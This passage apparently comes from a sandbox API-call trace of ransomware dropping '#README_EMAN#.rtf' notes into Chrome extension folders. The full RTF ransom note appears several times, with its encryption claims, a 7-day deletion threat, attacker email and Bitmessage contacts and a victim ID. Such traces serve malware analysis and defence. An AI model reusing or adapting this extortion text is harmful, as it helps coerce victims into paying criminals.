WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x86\x8f\x9e\x93?ç\x80q\x1cs\x05ÓGZ¸ºewN0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.281] WriteFile (in: hFile=0x2f4, lpBuffer=0x23688d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23688d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.282] CloseHandle (hObject=0x2f4) returned 1 [0297.283] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\#readme_eman#.rtf")) returned 0x20 [0297.283] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#readme_eman#.rtf")) returned 0x20 [0297.283] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0297.283] GetLastError () returned 0x2 [0297.283] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 